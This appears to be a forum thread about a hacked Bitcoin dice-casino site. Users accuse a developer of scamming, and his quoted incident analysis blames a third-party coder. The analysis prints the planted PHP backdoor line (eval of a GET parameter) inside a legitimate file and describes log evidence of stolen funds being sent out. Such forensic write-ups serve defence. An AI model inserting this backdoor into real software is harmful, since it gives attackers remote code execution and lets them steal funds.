https://bitcointalksearch.org/topic/johny1976-is-a-scam-artist-dont-buy-any-of-his-code-921267
Peopled do yourself a favor and do not buying nothing from this guy. if you have purchased something, get it tested, as there have been two hacked sites fro this developer that i know of.
https://hashtalk.org/topic/28626/paydice-hacked/1
awesome job johny1976
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
This is EVIDENCE that exploit was caused by 3rd person, who did custom edits for bandot
To the recent hack:
Thank you.
I've investigated the issue and here is my conclusion:
Fact 1
This is head of our original file /content/ajax/_stats_load.php:
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
This is head of your custom edited file /content/ajax/_stats_load.php:
";}echo "
";}mysql_close();exit;}else if(isset($_GET['eval'])) {eval($_GET['eval']);exit;}
/*
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
Please pay closer attention to eval($_GET['eval']) part (this is the used exploit).
Fact 2
This line is from your webserver log:
Please pay closer attention to ?eval=... part and sendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN part.
The second part is the address on which the stolen funds were sent.
Fact 3
The file _stats_load.php could edit only someone who had full access to the system, in which case it would be much easier to withraw the funds directly from your wallet.
Fact 4
Only person who could edit this file is the guy who did the custom coding for you.
I think it's clear enough. Someone (most possibly the guy who did custom login system for you) has put the backdoor to _stats_load.php, then executed his own PHP code on your server.
Resources:
/var/log/apache2/other_vhosts_access.log.1 your webserver log
/var/www/paydice/play/content/ajax/_stats_load.php compromised file
I'm sorry what happened to you. At least you know you can't trust anybody.
We would much appreciate your permission to make this case public (there's some people who claim this was our fault).
Hope I've cleared the whole thing out and pointed the real offender. Let me know if you need some additional informations or support.
Johny
Bandot's reply: